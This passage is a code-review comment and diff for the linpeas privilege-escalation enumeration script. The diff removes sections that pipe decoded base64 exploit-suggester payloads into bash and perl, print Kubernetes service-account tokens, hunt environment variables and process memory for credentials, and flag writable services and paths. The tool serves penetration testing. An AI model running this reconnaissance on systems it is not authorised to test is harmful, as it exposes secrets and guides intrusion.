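Review bot: Nothing guards against the `peass{CHECKS}` marker surviving into the generated script: if the builder's substitution is skipped or the key is misspelled, `CHECKS` defaults to the literal marker, every `echo $CHECKS | grep -q <section>` guard (visible in the next hunk, e.g. `grep -q SysI`) is false, and linpeas finishes having run no checks without any error. A sanity check where the builder writes its output (fail the build if any `peass{` marker remains) or a runtime guard right after the defaults, such as `case "$CHECKS" in *peass\{*) echo "Unreplaced build marker in CHECKS" >&2; exit 1;; esac`, would make that failure loud. The same marker is used for the `-o` help text in the second hunk (`@@ -77,7 +77,7 @@`); that one is only displayed, but the first is parsed by `grep -q`, so the builder must emit the same comma-separated list for both, otherwise the default and the documented section names drift apart.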
@@ -1100,2326 +1100,13 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil fi -if echo $CHECKS | grep -q SysI; then - ########################################### - #-------------) System Info (-------------# - ########################################### - print_title "System Information" - #-- SY) OS - print_2title "Operative system" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" - (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," - warn_exec lsb_release -a 2>/dev/null - if [ "$MACPEAS" ]; then - warn_exec system_profiler SPSoftwareDataType - fi - echo "" - #-- SY) Sudo - print_2title "Sudo version" - if [ "$(command -v sudo 2>/dev/null)" ]; then - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" - sudo -V 2>/dev/null | grep 
"Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," - else echo_not_found "sudo" - fi - echo "" - #--SY) USBCreator - print_2title "USBCreator" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" - if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then - pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") - if [ -z "$pc_version" ]; then - pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) - fi - if [ -n "$pc_version" ]; then - pc_length=${#pc_version} - pc_major=$(echo "$pc_version" | cut -d. -f1) - pc_minor=$(echo "$pc_version" | cut -d. -f2) - if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then - echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," - fi - fi - fi - echo "" - #-- SY) PATH - print_2title "PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" - echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" - echo "" - #-- SY) Date - print_2title "Date & uptime" - warn_exec date 2>/dev/null - warn_exec uptime 2>/dev/null - echo "" - #-- SY) System stats - print_2title "System stats" - (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" - warn_exec free 2>/dev/null - echo "" - #-- SY) CPU info - print_2title "CPU info" - warn_exec lscpu 2>/dev/null - echo "" - #-- SY) Environment vars - print_2title "Environment" - print_info "Any private information inside environment variables?" 
- (env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" - echo "" - #-- SY) Dmesg - print_2title "Searching Signature verification failed in dmseg" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" - (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" - echo "" - #-- SY) Kernel extensions - if [ "$MACPEAS" ]; then - print_2title "Kernel Extensions not belonging to apple" - kextstat 2>/dev/null | grep -Ev " com.apple." - - print_2title "Unsigned Kernel Extensions" - macosNotSigned /Library/Extensions - macosNotSigned /System/Library/Extensions - fi - - if [ "$(command -v bash 2>/dev/null)" ]; then - print_2title "Executing Linux Exploit Suggester" - print_info "https://github.com/mzet-/linux-exploit-suggester" - les_b64="peass{LES}" - echo $les_b64 | base64 -d | bash - echo "" - fi - - if [ "$(command -v perl 2>/dev/null)" ]; then - print_2title "Executing Linux Exploit Suggester 2" - print_info "https://github.com/jondonas/linux-exploit-suggester-2" - les2_b64="peass{LES2}" - echo $les2_b64 | base64 -d | perl - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Doctor Suggestions" - brew doctor - echo "" - fi - - - - #-- SY) AppArmor - print_2title "Protections" - print_list "AppArmor enabled? 
.............. "$NC - if [ "$(command -v aa-status 2>/dev/null)" ]; then - aa-status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then - apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then - ls -d /etc/apparmor* - else - echo_not_found "AppArmor" - fi - - #-- SY) grsecurity - print_list "grsecurity present? ............ "$NC - ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") - - #-- SY) PaX - print_list "PaX bins present? .............. "$NC - (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") - - #-- SY) Execshield - print_list "Execshield enabled? ............ "$NC - (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," - - #-- SY) SElinux - print_list "SELinux enabled? ............... "$NC - (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - - #-- SY) Gatekeeper - if [ "$MACPEAS" ]; then - print_list "Gatekeeper enabled? .......... "$NC - (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - - print_list "sleepimage encrypted? ........ "$NC - (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no - - print_list "XProtect? .................... "$NC - (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no - - print_list "SIP enabled? ................. "$NC - csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no - - print_list "Connected to JAMF? ........... "$NC - warn_exec jamf checkJSSConnection - - print_list "Connected to AD? ............. "$NC - dsconfigad -show && echo "" || echo_no - fi - - #-- SY) ASLR - print_list "Is ASLR enabled? ............... 
"$NC - ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) - if [ -z "$ASLR" ]; then - echo_not_found "/proc/sys/kernel/randomize_va_space"; - else - if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi - echo "" - fi - - #-- SY) Printer - print_list "Printer? ....................... "$NC - (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null - - #-- SY) Running in a virtual environment - print_list "Is this a virtual machine? ..... "$NC - hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) - if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then - detectedvirt=$(systemd-detect-virt) - if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi - else - if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi - fi - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q Container; then - ############################################## - #---------------) Containers (---------------# - ############################################## - print_title "Containers" - containerCheck - - print_2title "Container related tools present" - command -v "$CONTAINER_CMDS" - - print_2title "Container details" - print_list "Is this a container? ...........$NC $containerType" - - print_list "Any running containers? ........ 
"$NC - # Get counts of running containers for each platform - dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) - podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) - lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) - rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) - if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then - echo_no - else - containerCounts="" - if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi - if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi - if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi - if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi - echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," - # List any running containers - if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi - if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi - fi - - #If docker - if echo "$containerType" | grep -qi "docker"; then - print_2title "Docker Container details" - inDockerGroup - print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Looking and enumerating Docker Sockets\n"$NC - enumerateDockerSockets - print_list "Docker version .................$NC$dockerVersion" 
- checkDockerVersionExploits - print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - if [ "$inContainer" ]; then - checkDockerRootless - print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," - fi - if df -h | grep docker; then - print_2title "Docker Overlays" - df -h | grep docker - fi - fi - - if [ "$inContainer" ]; then - echo "" - print_2title "Container & breakout enumeration" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname)" - if echo "$containerType" | grep -qi "docker"; then - print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" - fi - if echo "$containerType" | grep -qi "kubernetes"; then - print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" - print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" - fi - - checkContainerExploits - print_list "Vulnerable to CVE-2019-5021 .. 
$VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - echo "" - - print_2title "Container Capabilities" - capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" - echo "" - - print_2title "Privilege Mode" - if [ -x "$(command -v fdisk)" ]; then - if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," - else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," - fi - else - echo_not_found - fi - echo "" - - print_2title "Interesting Files Mounted" - (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" - echo "" - - print_2title "Possible Entrypoints" - ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq - echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - - -if echo $CHECKS | grep -q Devs; then - ########################################### - #---------------) Devices (---------------# - ########################################### - print_title "Devices" - - #-- 1D) sd in /dev - print_2title "Any sd*/disk* disk in /dev? (limit 20)" - ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 - echo "" - - #-- 2D) Unmounted - print_2title "Unmounted file-system?" 
- print_info "Check if you can mount umounted devices" - if [ -f "/etc/fstab" ]; then - grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" - else - echo_not_found "/etc/fstab" - fi - echo "" - - print_2title "Mounted disks information" - warn_exec diskutil list - echo "" - - print_2title "Mounted SMB Shares" - warn_exec smbutil statshares -a - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q AvaSof; then - ########################################### - #---------) Available Software (----------# - ########################################### - print_title "Available Software" - - #-- 1AS) Useful software - print_2title "Useful software" - command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null - echo "" - - #-- 2AS) Search for compilers - print_2title "Installed Compiler" - (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); - echo "" - - if [ "$(command -v pkg 2>/dev/null)" ]; then - print_2title "Vulnerable Packages" - pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Installed Packages" - brew list - echo "" - fi - - if [ "$MACPEAS" ]; then - print_2title "Writable Installed Applications" - system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - 
if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - - system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - echo "" - - #Useless info - #print_2title "Developer Tools" - #system_profiler SPDeveloperToolsDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then - #################################################### - #-----) Processes & Cron & Services & Timers (-----# - #################################################### - print_title "Processes, Cron, Services, Timers & Sockets" - - #-- PCS) Cleaned proccesses - print_2title "Cleaned processes" - if [ "$NOUSEPS" ]; then - printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC - fi - print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - - if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - pslist=$(print_ps) - else - (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed 
"s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" - fi - fi - done - pslist=$(ps auxwww) - echo "" - - #-- PCS) Binary processes permissions - print_2title "Binary processes permissions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - binW="IniTialiZZinnggg" - ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do - if [ -w "$bpath" ]; then - binW="$binW|$bpath" - fi - done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," - fi - echo "" - - #-- PCS) Files opened by processes belonging to other users - if ! 
[ "$IAMROOT" ]; then - print_2title "Files opened by processes belonging to other users" - print_info "This is usually empty because of the lack of privileges to read other user processes information" - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - echo "" - fi - - #-- PCS) Processes with credentials inside memory - print_2title "Processes with credentials in memory (root req)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" - if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi - if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi - if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi - if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi - if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi - if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi - echo "" - - #-- PCS) Different processes 1 min - if ! [ "$FAST" ] && ! 
[ "$SUPERFAST" ]; then - print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" - temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi - echo "" - fi - - #-- PCS) Cron - print_2title "Cron jobs" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" - command -v crontab 2>/dev/null || echo_not_found "crontab" - crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - command -v incrontab 2>/dev/null || echo_not_found "incrontab" - incrontab -l 2>/dev/null - ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." 
| sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - crontab -l -u "$USER" 2>/dev/null | tr -d "\r" - ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths - atq 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Third party LaunchAgents & LaunchDemons" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" - ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null - echo "" - - print_2title "Writable System LaunchAgents & LaunchDemons" - find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do - program="" - program=$(defaults read "$f" Program 2>/dev/null) - if ! 
[ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) - fi - if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - done - echo "" - - print_2title "StartupItems" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" - ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null - echo "" - - print_2title "Login Items" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" - osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null - echo "" - - print_2title "SPStartupItemDataType" - system_profiler SPStartupItemDataType - echo "" - - print_2title "Emond scripts" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" - ls -l /private/var/db/emondClients - echo "" - fi - - #-- PCS) Services - print_2title "Services" - print_info "Search for outdated versions" - (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" - echo "" - - #-- PSC) systemd PATH - print_2title "Systemd PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" - systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" - WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") - echo "" - - #-- PSC) .service files - #TODO: .service files in MACOS are folders - print_2title "Analyzing .service files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" - printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do - if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if ! 
[ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" - fi - servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths - printf "%s\n" "$servicebinpaths\n" | while read sp; do - if [ -w "$sp" ]; then - echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" - fi - done - relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") - relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") - if [ "$relpath1" ] || [ "$relpath2" ]; then - if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; - else - echo "$s is executing some relative path" - fi - fi - fi - done - if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi - echo "" - - #-- PSC) Timers - print_2title "System timers" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found - echo "" - - #-- PSC) .timer files - print_2title "Analyzing .timer files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do - if ! 
